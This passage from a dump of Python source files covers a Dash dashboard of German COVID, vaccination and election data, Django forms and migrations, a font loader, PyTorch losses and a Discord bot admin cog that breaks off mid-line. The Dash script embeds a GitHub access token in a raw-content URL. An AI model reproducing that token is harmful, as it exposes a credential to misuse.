Deutschland & Bundesressorts)\nvacc_data = pd.read_csv(url_vacc_data, skiprows=[1, 18])\n\n# Open Germany map as GeoJSON\nwith urlopen(\"https://raw.githubusercontent.com/isellsoap/deutschlandGeoJSON/main/2_bundeslaender/2_hoch.geo.json\") as file:\n germany_states = json.load(file)\n\n# Read-in Covid-Data (States)\nwith urlopen(\"https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/Coronaf%C3%A4lle_in_den_Bundesl%C3%A4ndern/FeatureServer/0/query?where=1%3D1&outFields=LAN_ew_AGS,LAN_ew_GEN,Aktualisierung,cases7_bl_per_100k,death7_bl,cases7_bl_per_100k_txt,cases7_bl&outSR=4326&f=json\") as cases_states:\n covid_states = json.load(cases_states)\n\ncovid_data = pd.json_normalize(covid_states, record_path=['features'])\n\n## Read in Voting-Results\nwith urlopen(\"https://raw.githubusercontent.com/julianrosenberger/VisualizationSDU/main/data/kerg2.csv?token=AQYCHUSY2GHUHR23UV3RZU3BYGNO2\") as f:\n data = pd.read_csv(f, delimiter=';', skiprows=9, usecols=['Gebietsnummer', 'Gebietsname', 'UegGebietsnummer', 'Gruppenart', 'Gruppenname', 'Gruppenreihenfolge', 'Stimme',\t'Prozent'])\n\n\n# #Deleting where Gruppenart!=Partei\ndf_clear=data[data.Gruppenart==\"Partei\"]\n\n# deleting Stimme==2:\ndf_clear2 = df_clear[df_clear.Stimme==1]\n\n# Grouped dataframe with only the states 1-16 (both incl.)\ndf_clear3 = df_clear2[df_clear2.Gebietsnummer < 17]\n\n# Make sure Gebietsnummer belongs to state\ndf_clear4 = df_clear3[df_clear3.UegGebietsnummer == 99]\n\n\ndf_clear = df_clear4\n\n# cleaning \nprint(type('Prozent')) # string --> convert to int\n\n#(nan --> 0\ndf_clear['Prozent'] = df_clear['Prozent'].fillna(0)\n\n# , --> .\ndf_clear['Prozent'] = (df_clear['Prozent'].replace(',', '.', regex=True).astype(float))\n\n# string --> int\ndf_clear['Prozent'] = pd.to_numeric(df_clear['Prozent'])\n\n#print(df_clear.to_string())\n\n\n# Gruping by state:\ndf_group = df_clear.groupby('Gebietsnummer')\nprint(df_group)\n#print(df_group['Gebietsnummer'] == 11)\n\nfor key, item in df_group:\n print(df_group.get_group(key))\n\n# Get the indices of the original dataframe to find out which party etc. 
it belongs to:\n#idx = df_group(['Gebietsnummer'])['Prozent'].transform(max) == df_clear['Prozent']\n#print(idx.head())\n\nmaximums = df_group['Prozent'].max()\n#print(maximums.to_string())\n\n#print(df_clear.loc[df_clear.groupby(['Gebietsnummer'])['Prozent'].idxmax()].reset_index(drop=True))\n\nwinners = df_clear.loc[df_clear.groupby(['Gebietsnummer'])['Prozent'].idxmax()].reset_index(drop=True)\nprint(winners.to_string())\n\n\n\n\n\n\n\n\n\n\n## Plot Vaccination Map\nvacc = px.choropleth_mapbox(\n mapbox_style='white-bg',\n data_frame=vacc_data,\n geojson=germany_states,\n locations='Bundesland',\n featureidkey='properties.name',\n hover_name='Bundesland',\n hover_data={'Bundesland': False,\n 'Impfquote_gesamt_voll': ':.2f%',\n 'Datum': True},\n color='Impfquote_gesamt_voll',\n color_continuous_scale=px.colors.sequential.Blues,\n labels={'Impfquote_gesamt_voll': 'Fully vaccinated', 'Bundesland': 'State', 'Datum': 'Date'}\n )\nvacc.update_mapboxes(\n center_lat=51.5,\n center_lon=10.25,\n zoom=4.6\n)\nvacc.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\n\n## Plot Covid-Map\ncov = px.choropleth_mapbox(\n mapbox_style='white-bg',\n data_frame=covid_data,\n geojson=germany_states,\n locations='attributes.LAN_ew_GEN',\n featureidkey='properties.name',\n hover_name='attributes.LAN_ew_GEN',\n hover_data={'attributes.LAN_ew_GEN': False,\n 'attributes.cases7_bl_per_100k': ':.2f',\n 'attributes.death7_bl': True},\n color='attributes.cases7_bl_per_100k',\n color_continuous_scale=px.colors.sequential.YlOrRd,\n labels={'attributes.cases7_bl_per_100k': '7-day incidence', 'attributes.LAN_ew_GEN': 'State', 'attributes.death7_bl': '7-day deaths'}\n)\ncov.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\ncov.update_mapboxes(\n center_lat=51.5,\n center_lon=10.25,\n zoom=4.6\n)\n\n\n## Plot Voting-results\nvote = px.choropleth_mapbox(\n mapbox_style='white-bg',\n data_frame=winners,\n geojson=germany_states,\n locations='Gebietsname',\n featureidkey='properties.name',\n hover_name='Gebietsname',\n hover_data={'Gebietsname': False,\n 'Gruppenname': True,\n 'Prozent': ':.2f%'},\n color='Gruppenname',\n color_discrete_map={'SPD': \"#E3000F\",\n \"CDU\": \"#32302e\",\n \"CSU\": \"#32302e\",\n \"AfD\": \"#009ee0\"},\n labels={'Gebietsname': 'State', 'Gruppenname': 'Party', 'Prozent': 'Result'}\n)\nvote.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\nvote.update_mapboxes(\n center_lat=51.5,\n center_lon=10.25,\n zoom=4.6\n)\n\n\n## Plot Voting-results in form of pie chart:\n# want for entire Germany, instead of states:\nvote_germ=data[data.Gebietsnummer==99]\nvote_germ = vote_germ[vote_germ.Stimme==1]\nvote_germ=vote_germ[vote_germ.Gruppenart==\"Partei\"]\nvote_germ=vote_germ[vote_germ.Gebietsname==\"Bundesgebiet\"]\n\n# cleaning \n#(nan --> 0\nvote_germ['Prozent'] = vote_germ['Prozent'].fillna(0)\n\n# , --> .\nvote_germ['Prozent'] = (vote_germ['Prozent'].replace(',', '.', regex=True).astype(float))\n\n# string --> int\nvote_germ['Prozent'] = pd.to_numeric(vote_germ['Prozent'])\n\n#print(vote_germ.to_string())\n\n\n\n# 47 different states. 
Diving into: SPD, CDU/CSU, AfD, and \"Others\":\n#vote_germ.loc[vote_germ['Gruppenname'] == \"CDU\", 'Gruppenname'] = \"CDU/CSU\"\n#vote_germ.loc[vote_germ['Gruppenname'] == \"CSU\", 'Gruppenname'] = \"CDU/CSU\"\n\nvote_germ.loc[vote_germ['Prozent'] < 6, 'Gruppenname'] = \"Other\"\nvote_germ.loc[vote_germ['Gruppenname'] == \"FDP\", 'Gruppenname'] = \"Other\"\nvote_germ.loc[vote_germ['Gruppenname'] == \"GRÜNE\", 'Gruppenname'] = \"Other\"\n\n\n \n \nvote_chart = px.pie(vote_germ, values='Prozent', names='Gruppenname', color='Gruppenname',\n color_discrete_map={'SPD':'#E3000F',\n 'CDU':'32302e',\n 'CSU':'#0080c8',\n 'AfD':'009ee0',\n 'Other':'grey'})\n\n#vote_chart.show()\n\n\n\n\n## Build web app with dash\napp = dash.Dash(__name__)\n\napp.layout = lambda: html.Div([\n # H1-Header\n html.H1(children=\"Does voting against vaccinations mean voting for COVID?\",\n style={'textAlign': 'center', 'fontFamily': 'Helvetica, Arial, sans-serif'}),\n html.Div([\n html.Div([\n dcc.Graph(figure=vacc)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=cov)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=vote)\n ], style={'width': '33%', 'float': 'left'})\n ]),\n html.Div([\n html.Div([\n dcc.Graph(figure=vacc)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=cov)\n ], style={'width': '33%', 'float': 'left'}),\n html.Div([\n dcc.Graph(figure=vote)\n ], style={'width': '33%', 'float': 'left'})\n ])\n])\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8080)\n \n \n \n "} {"ext": "py", "sha": "1a2efe784b6d2430e080b7c557c24993e4843e6d", "content": "# -*- coding: utf-8 -*-\n\n__version__ = '19.9.0.dev1'\n\nPROJECT_NAME = \"galaxy-data\"\nPROJECT_OWNER = PROJECT_USERAME = \"galaxyproject\"\nPROJECT_URL = \"https://github.com/galaxyproject/galaxy\"\nPROJECT_AUTHOR = 'Galaxy Project and Community'\nPROJECT_DESCRIPTION = 'Galaxy Datatype Framework and Datatypes'\nPROJECT_EMAIL = 'galaxy-committers@lists.galaxyproject.org'\nRAW_CONTENT_URL = \"https://raw.github.com/%s/%s/master/\" % (\n PROJECT_USERAME, PROJECT_NAME\n)\n"} {"ext": "py", "sha": "1a2efed9ef854913b615cd765d6fefecf05ed99b", "content": "from __future__ import unicode_literals\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Field, Layout, Submit\nfrom django import forms\nfrom django.contrib.auth import get_user_model\n\nfrom . 
import models\n\nUser = get_user_model()\n\n\nclass UserForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(UserForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(\n Field('name'),\n )\n\n class Meta:\n model = User\n fields = ['name']\n\n\nclass ProfileForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(ProfileForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.layout = Layout(\n Field('picture'),\n Field('bio'),\n Submit('update', 'Update', css_class=\"btn-success\"),\n )\n\n class Meta:\n model = models.Profile\n fields = ['picture', 'bio']\n"} {"ext": "py", "sha": "1a2eff72245f196576db87587bf0ecc1b0819cce", "content": "# SPDX-FileCopyrightText: 2019 Scott Shawcroft for Adafruit Industries\n#\n# SPDX-License-Identifier: MIT\n\n\"\"\"\n`adafruit_bitmap_font.bdf`\n====================================================\n\nLoads BDF format fonts.\n\n* Author(s): Scott Shawcroft\n\nImplementation Notes\n--------------------\n\n**Hardware:**\n\n**Software and Dependencies:**\n\n* Adafruit CircuitPython firmware for the supported boards:\n https://github.com/adafruit/circuitpython/releases\n\n\"\"\"\n\nimport gc\nfrom fontio import Glyph\nfrom .glyph_cache import GlyphCache\n\n__version__ = \"1.3.4\"\n__repo__ = \"https://github.com/adafruit/Adafruit_CircuitPython_Bitmap_Font.git\"\n\n\nclass BDF(GlyphCache):\n \"\"\"Loads glyphs from a BDF file in the given bitmap_class.\"\"\"\n\n def __init__(self, f, bitmap_class):\n super().__init__()\n self.file = f\n self.name = f\n self.file.seek(0)\n self.bitmap_class = bitmap_class\n line = self.file.readline()\n line = str(line, \"utf-8\")\n if not line or not line.startswith(\"STARTFONT 2.1\"):\n raise ValueError(\"Unsupported file version\")\n self.point_size = None\n self.x_resolution = None\n self.y_resolution = None\n self._ascent = None\n self._descent = None\n\n @property\n def descent(self):\n \"\"\"The number of pixels below the baseline of a typical descender\"\"\"\n if self._descent is None:\n self.file.seek(0)\n while True:\n line = self.file.readline()\n if not line:\n break\n\n if line.startswith(b\"FONT_DESCENT \"):\n self._descent = int(line.split()[1])\n break\n\n return self._descent\n\n @property\n def ascent(self):\n \"\"\"The number of pixels above the baseline of a typical ascender\"\"\"\n if self._ascent is None:\n self.file.seek(0)\n while True:\n line = self.file.readline()\n line = str(line, \"utf-8\")\n if not line:\n break\n\n if line.startswith(\"FONT_ASCENT \"):\n self._ascent = int(line.split()[1])\n break\n\n return self._ascent\n\n def get_bounding_box(self):\n \"\"\"Return the maximum glyph size as a 4-tuple of: width, height, x_offset, y_offset\"\"\"\n self.file.seek(0)\n while True:\n line = self.file.readline()\n line = str(line, \"utf-8\")\n if not line:\n break\n\n if line.startswith(\"FONTBOUNDINGBOX \"):\n _, x, y, x_offset, y_offset = line.split()\n return (int(x), int(y), int(x_offset), int(y_offset))\n return None\n\n def load_glyphs(self, code_points):\n # pylint: disable=too-many-statements,too-many-branches,too-many-nested-blocks,too-many-locals\n metadata = True\n character = False\n code_point = None\n bytes_per_row = 1\n desired_character = False\n current_info = {}\n current_y = 0\n rounded_x = 1\n if isinstance(code_points, int):\n remaining = set()\n remaining.add(code_points)\n elif isinstance(code_points, str):\n remaining = 
set(ord(c) for c in code_points)\n elif isinstance(code_points, set):\n remaining = code_points\n else:\n remaining = set(code_points)\n for code_point in remaining.copy():\n if code_point in self._glyphs and self._glyphs[code_point]:\n remaining.remove(code_point)\n if not remaining:\n return\n\n x, _, _, _ = self.get_bounding_box()\n\n self.file.seek(0)\n while True:\n line = self.file.readline()\n if not line:\n break\n if line.startswith(b\"CHARS \"):\n metadata = False\n elif line.startswith(b\"SIZE\"):\n _, self.point_size, self.x_resolution, self.y_resolution = line.split()\n elif line.startswith(b\"COMMENT\"):\n pass\n elif line.startswith(b\"STARTCHAR\"):\n # print(lineno, line.strip())\n # _, character_name = line.split()\n character = True\n elif line.startswith(b\"ENDCHAR\"):\n character = False\n if desired_character:\n bounds = current_info[\"bounds\"]\n shift = current_info[\"shift\"]\n gc.collect()\n self._glyphs[code_point] = Glyph(\n current_info[\"bitmap\"],\n 0,\n bounds[0],\n bounds[1],\n bounds[2],\n bounds[3],\n shift[0],\n shift[1],\n )\n remaining.remove(code_point)\n if not remaining:\n return\n desired_character = False\n elif line.startswith(b\"BBX\"):\n if desired_character:\n _, x, y, x_offset, y_offset = line.split()\n x = int(x)\n y = int(y)\n x_offset = int(x_offset)\n y_offset = int(y_offset)\n current_info[\"bounds\"] = (x, y, x_offset, y_offset)\n current_info[\"bitmap\"] = self.bitmap_class(x, y, 2)\n elif line.startswith(b\"BITMAP\"):\n if desired_character:\n rounded_x = x // 8\n if x % 8 > 0:\n rounded_x += 1\n bytes_per_row = rounded_x\n if bytes_per_row % 4 > 0:\n bytes_per_row += 4 - bytes_per_row % 4\n current_y = 0\n elif line.startswith(b\"ENCODING\"):\n _, code_point = line.split()\n code_point = int(code_point)\n if code_point in remaining:\n desired_character = True\n current_info = {\"bitmap\": None, \"bounds\": None, \"shift\": None}\n elif line.startswith(b\"DWIDTH\"):\n if desired_character:\n _, shift_x, shift_y = line.split()\n shift_x = int(shift_x)\n shift_y = int(shift_y)\n current_info[\"shift\"] = (shift_x, shift_y)\n elif line.startswith(b\"SWIDTH\"):\n pass\n elif character:\n if desired_character:\n bits = int(line.strip(), 16)\n width = current_info[\"bounds\"][0]\n start = current_y * width\n x = 0\n for i in range(rounded_x):\n val = (bits >> ((rounded_x - i - 1) * 8)) & 0xFF\n for j in range(7, -1, -1):\n if x >= width:\n break\n bit = 0\n if val & (1 << j) != 0:\n bit = 1\n current_info[\"bitmap\"][start + x] = bit\n x += 1\n current_y += 1\n elif metadata:\n # print(lineno, line.strip())\n pass\n"} {"ext": "py", "sha": "1a2eff76347edd7feca6555985906f25b58cef71", "content": "from django.apps import AppConfig\n\n\nclass AliasConfig(AppConfig):\n name = 'alias'\n\n def ready(self):\n import alias.signals\n"} {"ext": "py", "sha": "1a2f00607b5285c4e74d5722267267021df2950b", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nMicrosoft-Windows-DeviceUx\nGUID : ded165cf-485d-4770-a3e7-9c5f0320e80c\n\"\"\"\nfrom construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct\nfrom etl.utils import WString, CString, SystemTime, Guid\nfrom etl.dtyp import Sid\nfrom etl.parsers.etw.core import Etw, declare, guid\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=51, version=0)\nclass Microsoft_Windows_DeviceUx_51_0(Etw):\n pattern = Struct(\n \"String1\" / WString,\n \"Integer2\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), 
event_id=55, version=0)\nclass Microsoft_Windows_DeviceUx_55_0(Etw):\n pattern = Struct(\n \"String1\" / WString,\n \"Integer2\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=80, version=0)\nclass Microsoft_Windows_DeviceUx_80_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul,\n \"EnumerationTime\" / Int32ul,\n \"CountOfItems\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=81, version=0)\nclass Microsoft_Windows_DeviceUx_81_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul,\n \"EnumerationTime\" / Int32ul,\n \"CountOfItems\" / Int32ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=82, version=0)\nclass Microsoft_Windows_DeviceUx_82_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=83, version=0)\nclass Microsoft_Windows_DeviceUx_83_0(Etw):\n pattern = Struct(\n \"querycookie\" / Int64ul\n )\n\n\n@declare(guid=guid(\"ded165cf-485d-4770-a3e7-9c5f0320e80c\"), event_id=1001, version=0)\nclass Microsoft_Windows_DeviceUx_1001_0(Etw):\n pattern = Struct(\n \"ErrorCode\" / Int32ul\n )\n\n"} {"ext": "py", "sha": "1a2f007c466894ea379b8ab52aff0595035ddc51", "content": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nclass DetLoss(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.hm_criterion = nn.BCEWithLogitsLoss(reduction='none')\n self.ori_criterion = nn.SmoothL1Loss(reduction='none')\n self.box_criterion = nn.SmoothL1Loss(reduction='none')\n\n def forward(self, \n pred_heatmaps, heatmaps,\n pred_sizemaps, sizemaps,\n pred_orimaps , orimaps,\n ):\n\n size_w, _ = heatmaps.max(dim=1, keepdim=True)\n p_det = torch.sigmoid(pred_heatmaps * (1-2*heatmaps))\n \n det_loss = (self.hm_criterion(pred_heatmaps, heatmaps)*p_det).mean() / p_det.mean()\n box_loss = (size_w * self.box_criterion(pred_sizemaps, sizemaps)).mean() / size_w.mean()\n\n ori_loss = (size_w * self.ori_criterion(pred_orimaps, orimaps)).mean() / size_w.mean()\n\n return det_loss, box_loss, ori_loss\n\n\nclass SegLoss(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.criterion = nn.BCEWithLogitsLoss(reduction='none')\n\n def forward(self, pred_bev, bev):\n\n return self.criterion(pred_bev, bev).mean()\n \nclass MotLoss(nn.Module):\n def __init__(self, distill, smooth):\n super().__init__()\n\n self.bc_criterion = nn.L1Loss(reduction='none')\n self.cmd_criterion = nn.BCELoss()\n self.distill = distill\n self.smooth = smooth\n\n def forward(self, plan_locs, cast_locs, locs, pred_cmds, expert_locs, expert_cmds, cmds, idxs=None):\n\n T = locs.size(1)\n N = pred_cmds.size(1)\n\n plan_locs = plan_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n plan_losses = self.bc_criterion(plan_locs, locs).mean(dim=[1,2])\n\n if self.distill:\n cast_loss = self.bc_criterion(cast_locs, expert_locs.detach()).mean()\n cmd_loss = self.cmd_criterion(pred_cmds, expert_cmds.detach())\n else:\n cast_locs = cast_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n cast_loss = self.bc_criterion(cast_locs, locs).mean()\n\n cmds_label = (1.-self.smooth) * F.one_hot(cmds, N) + self.smooth / N\n cmd_loss = self.cmd_criterion(pred_cmds, cmds_label)\n\n if idxs is None:\n plan_loss = plan_losses.mean()\n else:\n plan_loss = plan_losses[idxs].mean()\n\n return (plan_loss + cast_loss) / 2, cmd_loss\n\n def others_forward(self, cast_locs, expert_locs, locs):\n\n if 
self.distill:\n return self.bc_criterion(cast_locs, expert_locs).mean()\n else:\n other_bc_losses = self.bc_criterion(cast_locs, locs).mean(dim=[2,3])\n return other_bc_losses.min(1)[0].mean()\n\n def bev_forward(self, plan_locs, cast_locs, locs, pred_cmds, cmds, idxs=None):\n\n T = locs.size(1)\n N = pred_cmds.size(1)\n\n plan_locs = plan_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n plan_losses = self.bc_criterion(plan_locs, locs).mean(dim=[1,2])\n \n cast_locs = cast_locs.gather(1, cmds.expand(T,2,1,-1).permute(3,2,0,1)).squeeze(1)\n cast_loss = self.bc_criterion(cast_locs, locs).mean()\n\n cmd_loss = self.cmd_criterion(pred_cmds, F.one_hot(cmds, N).float())\n\n if idxs is None:\n plan_loss = plan_losses.mean()\n else:\n plan_loss = plan_losses[idxs].mean()\n\n return (plan_loss + cast_loss) / 2, cmd_loss\n"} {"ext": "py", "sha": "1a2f02c74aa43cde7ade9c2f613bb4934f8f09fb", "content": "from django.db.models.signals import pre_save\nfrom django.dispatch import receiver\nfrom order.models import Order\nfrom order.tpaga import revertedPaid\n\n@receiver(pre_save, sender=Order)\ndef changeReverted(sender, instance, **kwargs):\n try:\n old = sender.objects.get(id=instance.id)\n status = old.status\n except:\n status = 'created'\n \n if instance.status == 'reverted':\n isSuccess = revertedPaid(instance.token)\n if not isSuccess:\n instance.status = status\n instance.save()\n"} {"ext": "py", "sha": "1a2f0367777a5cca73e502e5988c7d1e28d94acf", "content": "import bing_face_api as bfa\n\nif __name__ == '__main__':\n '''\n コマンドライン引数を使用する場合\n 顔認識する画像のディレクトリ\n search_dir = sys.argv[0]\n '''\n # 顔認識する画像のディレクトリ\n search_dir = \"./image/original/\"\n # 顔認識する画像のファイル名を取得\n img_path_list = bfa.get_image_path_list(search_dir)\n # 顔認識\n bfa.detect_image(img_path_list)\n"} {"ext": "py", "sha": "1a2f04aac3c89598aba4363fc45a22d6066611ed", "content": "import pytest\n\nfrom trackash.users.models import User\n\npytestmark = pytest.mark.django_db\n\n\ndef test_user_get_absolute_url(user: User):\n assert user.get_absolute_url() == f\"/users/{user.username}/\"\n"} {"ext": "py", "sha": "1a2f04fc687ba5d8f741dfab722afddcc43a26c3", "content": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.4 on 2017-05-16 13:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\ndef PopulateLevelCreatedDateField(apps, schema_editor):\n level_model = apps.get_model(\"indicators\", \"Level\")\n levels = level_model.objects.all()\n\n for l in levels:\n if l.name == 'Goal':\n l.create_date = '2015-10-03 19:03:50'\n elif l.name == 'Output':\n l.create_date = '2015-10-03 19:03:52'\n elif l.name == 'Outcome':\n l.create_date = '2015-10-03 19:03:51'\n elif l.name == 'Activity':\n l.create_date = '2015-10-03 19:03:53'\n elif l.name == 'Impact':\n l.create_date = '2015-10-03 19:03:54'\n l.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('indicators', '0007_auto_20170510_0749'),\n ]\n\n operations = [\n migrations.RunPython(PopulateLevelCreatedDateField),\n ]\n"} {"ext": "py", "sha": "1a2f067ba59df834f1618b66a58564196c665557", "content": "# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\ndef get_package_data():\n return {'astropy.nddata.tests': ['data/*.fits']}\n"} {"ext": "py", "sha": "1a2f0859309356f1b27d59011374a656f9780441", "content": "# -*- coding: utf-8 -*-\r\n\r\nimport asyncio\r\nfrom datetime import datetime\r\n\r\nfrom cmyui import log, Ansi\r\nfrom cmyui.osu import Mods\r\nfrom discord import Embed\r\nfrom discord.ext import 
commands\r\nfrom discord.threads import Thread\r\nfrom tinydb.operations import set as dbset\r\nfrom tinydb.queries import Query\r\n\r\nfrom objects.sakuro import Sakuro, ContextWrap\r\nfrom osu.calculator import Calculator\r\nfrom objects import glob, config\r\nfrom utils.misc import convert_status_str, convert_str_status, make_safe_name, convert_grade_emoji, sakuru_only\r\nfrom objects.user import UserHelper\r\nfrom utils.wrappers import sakuroCommand\r\nfrom utils.misc import BEATMAP_REGEX\r\n\r\nQUEUE_EMOJIS = (\r\n '1️⃣',\r\n '2️⃣',\r\n '3️⃣',\r\n '4️⃣',\r\n '5️⃣'\r\n)\r\n\r\n\r\nclass AdminCog(commands.Cog, name='Admin'):\r\n \"\"\"Utilities for admins.\"\"\"\r\n\r\n def __init__(self, bot: Sakuro):\r\n self.bot = bot\r\n self.hide = True\r\n\r\n @sakuroCommand(name='reload', hidden=True)\r\n @commands.is_owner()\r\n async def _reload(self, ctx: ContextWrap, module: str):\r\n \"\"\"Reloads a module.\"\"\"\r\n try:\r\n self.bot.unload_extension(module)\r\n self.bot.load_extension(module)\r\n except Exception as e:\r\n await ctx.send('\\N{PISTOL}')\r\n await ctx.send('{}: {}'.format(type(e).__name__, e))\r\n else:\r\n await ctx.send('\\N{OK HAND SIGN}')\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.is_owner()\r\n async def shutdown(self, ctx: ContextWrap) -> None:\r\n await ctx.send('Night night..')\r\n await self.bot.close()\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def replay(self, ctx: ContextWrap, nickname: str, mods: str, map_id: int):\r\n player = await UserHelper.getOsuUserByName(make_safe_name(nickname), 'info')\r\n description = \"\"\r\n\r\n if not player:\r\n async with glob.http.get(\"https://sakuru.pw/api/search\", params={\r\n \"q\": nickname\r\n }) as resp:\r\n if resp.status == 200:\r\n data = await resp.json()\r\n\r\n if data['length'] == 0:\r\n return await ctx.send(f\"Nothing matched with {nickname} not found, check your spelling.\")\r\n\r\n embed = Embed(\r\n color=ctx.author.color,\r\n timestamp=datetime.now()\r\n )\r\n\r\n embed.set_author(name=f\"Search queue for {nickname}\")\r\n\r\n for idx, row in enumerate(data['matches']):\r\n description += f\"**{idx + 1}.** [{row['name']}](https://sakuru.pw/u/{row['id']})\\n\"\r\n\r\n embed.description = description\r\n description = \"\"\r\n message = await ctx.send(embed=embed)\r\n\r\n for emoji in QUEUE_EMOJIS[:data['length']]:\r\n await message.add_reaction(emoji)\r\n try:\r\n reaction, user = await self.bot.wait_for('reaction_add',\r\n check=lambda r, u: r.message.id == message.id \\\r\n and r.emoji in QUEUE_EMOJIS \\\r\n and u == ctx.author,\r\n timeout=60.0)\r\n except asyncio.TimeoutError:\r\n await ctx.send('Time is out!')\r\n else:\r\n player = await UserHelper.getOsuUserByName(\r\n make_safe_name(\r\n data['matches'][QUEUE_EMOJIS.index(reaction.emoji)]['name']),\r\n 'info'\r\n )\r\n await message.delete()\r\n else:\r\n return await ctx.send(\"Error! Try again.\")\r\n\r\n scores = await UserHelper.getUserScores(player['id'], 0, mods, 5, 'best', map_id)\r\n\r\n if len(scores) == 0:\r\n return await ctx.send(f\"This player has no scores on `{map_id}`!\")\r\n\r\n map_fullname = \"\"\r\n\r\n for idx, score in enumerate(scores):\r\n calc = await Calculator.calculate(\r\n score['beatmap']['id'],\r\n 0,\r\n score['mods'],\r\n score['acc'],\r\n None\r\n )\r\n map_fullname = calc['map_fullname']\r\n\r\n description += f\"\"\"** {idx + 1}. 
{f' +{Mods(score[\"mods\"])!r}' if score['mods'] != 0 else ''}** [{calc['stars']:.2f}★]\\n\"\"\" \\\r\n f\"▸ {convert_grade_emoji(score['grade'])} ▸ **{score['pp']:.2f}PP**\" \\\r\n f\"\"\"{f' *({calc[\"pp\"]:.2f}PP for {score[\"acc\"]:.2f}% FC)*' if score['grade'] not in ('S', 'SS', 'X', 'SH') else ''} \"\"\" \\\r\n f\"▸ {score['acc']:.2f}%\\n▸ {score['score']} ▸ x{score['max_combo']}/{score['beatmap']['max_combo']} \" \\\r\n f\"▸ [{score['n300']}/{score['n100']}/{score['n50']}/{score['nmiss']}]\\n\" \\\r\n f\"▸ [Score Set ]\" \\\r\n f\"(https://osu.sakuru.pw/api/get_replay?id={score['id']})\\n\"\r\n\r\n embed = Embed(color=ctx.author.color, description=description)\r\n\r\n embed.set_author(name=f\"Top {len(scores)} Plays for {player['name']} on {map_fullname}\",\r\n url=f\"https://sakuru.pw/u/{player['id']}\",\r\n icon_url=f\"https://sakuru.pw/static/flags/{player['country'].upper()}.png\")\r\n embed.set_footer(text=\"Click on Score Set to download replay.\",\r\n icon_url=\"https://sakuru.pw/static/ingame.png\")\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def restrict(self, ctx: ContextWrap, nickname: str, *reason: str):\r\n if not await UserHelper.getOsuUserByName(make_safe_name(nickname), 'info'):\r\n return await ctx.send(f\"Player with nickname {nickname} not found.\")\r\n\r\n admin = await UserHelper.getDiscordUser(ctx.message.author.id)\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\",\r\n params={\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"restrict\",\r\n \"nickname\": make_safe_name(nickname),\r\n \"reason\": ' '.join(reason),\r\n \"admin\": admin['safe_name']\r\n }) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n return await ctx.send(\"Error occurred.\")\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def unrestrict(self, ctx: ContextWrap, nickname: str, *reason: str):\r\n if not await UserHelper.getOsuUserByName(make_safe_name(nickname), 'info'):\r\n return await ctx.send(f\"Player with nickname {nickname} not found.\")\r\n\r\n admin = await UserHelper.getDiscordUser(ctx.message.author.id)\r\n\r\n async with glob.http.get(\"https://osu.sakuru.pw/api/handle_admin\",\r\n params={\r\n \"secret\": config.API_SECRET,\r\n \"action\": \"unrestrict\",\r\n \"nickname\": make_safe_name(nickname),\r\n \"reason\": ' '.join(reason),\r\n \"admin\": admin['safe_name']\r\n }) as resp:\r\n if resp.status == 200:\r\n await ctx.message.add_reaction('\\N{OK HAND SIGN}')\r\n else:\r\n return await ctx.send(\"Error occurred.\")\r\n\r\n @sakuroCommand(hidden=True)\r\n @commands.check(sakuru_only)\r\n @commands.has_permissions(ban_members=True)\r\n async def rqmap(self, ctx: ContextWrap, status: str, type: str):\r\n if (\r\n not isinstance(ctx.message.channel, Thread) 